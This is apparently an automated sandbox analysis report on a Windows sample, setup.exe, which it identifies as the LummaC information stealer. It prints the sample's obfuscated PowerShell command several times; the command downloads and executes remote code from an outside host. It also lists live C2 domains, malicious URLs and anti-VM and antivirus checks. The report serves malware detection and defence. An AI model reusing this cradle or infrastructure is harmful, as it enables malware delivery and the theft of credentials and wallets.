Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1582503
MD5:d781fd542a1dcb91c07c192bcac16f8e
SHA1:86ba60cac73d2f28120d452783622e7844e427f0
SHA256:7d28c7b252fb0b95ea0b5f305e5bb4e781773a9a8582a7cf1076650677263ef0
Tags:de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: D781FD542A1DCB91C07C192BCAC16F8E)
    • powershell.exe (PID: 7672 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ? MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • F3638EZUZ711WUU8SDVPW34XAAMUZ.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • F3638EZUZ711WUU8SDVPW34XAAMUZ.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp (PID: 7936 cmdline: "C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 8100 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5496 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3740 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5812 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3744 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6368 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5804 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5480 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7096 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4456 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 4312 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7368 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4304 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7424 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7412 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4924 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3264 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7564 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3412 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "learningypr.click", "appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "hummskitnj.buzz"], "Build id": "53b39e88--Qh"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4ef5a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: setup.exe PID: 7252JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: setup.exe PID: 7252JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: PowerShell Download and Execution Cradles
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe
          Sigma detected: PowerShell Web Download
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7252, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 7672, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:12.312033+010020283713Unknown Traffic192.168.2.449730104.21.32.1443TCP
          2024-12-30T19:10:13.288627+010020283713Unknown Traffic192.168.2.449731104.21.32.1443TCP
          2024-12-30T19:10:14.567126+010020283713Unknown Traffic192.168.2.449733104.21.32.1443TCP
          2024-12-30T19:10:15.816311+010020283713Unknown Traffic192.168.2.449735104.21.32.1443TCP
          2024-12-30T19:10:17.287015+010020283713Unknown Traffic192.168.2.449739104.21.32.1443TCP
          2024-12-30T19:10:20.610274+010020283713Unknown Traffic192.168.2.449741104.21.32.1443TCP
          2024-12-30T19:10:21.807662+010020283713Unknown Traffic192.168.2.449742104.21.32.1443TCP
          2024-12-30T19:10:25.849669+010020283713Unknown Traffic192.168.2.449743104.21.32.1443TCP
          2024-12-30T19:10:28.623498+010020283713Unknown Traffic192.168.2.449744104.21.32.1443TCP
          2024-12-30T19:10:29.906966+010020283713Unknown Traffic192.168.2.449745185.161.251.21443TCP
          2024-12-30T19:10:30.691182+010020283713Unknown Traffic192.168.2.449746172.67.208.58443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:12.801798+010020546531A Network Trojan was detected192.168.2.449730104.21.32.1443TCP
          2024-12-30T19:10:13.761440+010020546531A Network Trojan was detected192.168.2.449731104.21.32.1443TCP
          2024-12-30T19:10:29.102995+010020546531A Network Trojan was detected192.168.2.449744104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:12.801798+010020498361A Network Trojan was detected192.168.2.449730104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:13.761440+010020498121A Network Trojan was detected192.168.2.449731104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:31.106563+010020084381A Network Trojan was detected172.67.208.58443192.168.2.449746TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T19:10:21.064381+010020480941Malware Command and Control Activity Detected192.168.2.449741104.21.32.1443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://learningypr.click/apiAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apbAvira URL Cloud: Label: malware
          Source: learningypr.clickAvira URL Cloud: Label: malware
          Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apiSAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apicAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apijAvira URL Cloud: Label: malware
          Source: https://learningypr.click/ppAvira URL Cloud: Label: malware
          Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
          Source: https://learningypr.click/piAvira URL Cloud: Label: malware
          Source: https://learningypr.click/QAvira URL Cloud: Label: malware
          Source: https://learningypr.click:443/apiAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apies=0FAvira URL Cloud: Label: malware
          Source: https://learningypr.click/apiFAvira URL Cloud: Label: malware
          Source: https://cegu.shop/8574262446/ph.txt3hAvira URL Cloud: Label: malware
          Source: https://klipvumisui.shop/int_clp_sha.txt~Avira URL Cloud: Label: malware
          Found malware configuration
          Source: setup.exe.7252.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "learningypr.click", "appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "hummskitnj.buzz"], "Build id": "53b39e88--Qh"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeReversingLabs: Detection: 39%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.4% probability
          Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb< source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then lea ebx, dword ptr [edi-80000000h]0_2_007C8073
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000E4h]0_2_007D804D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-77h]0_2_007D804D
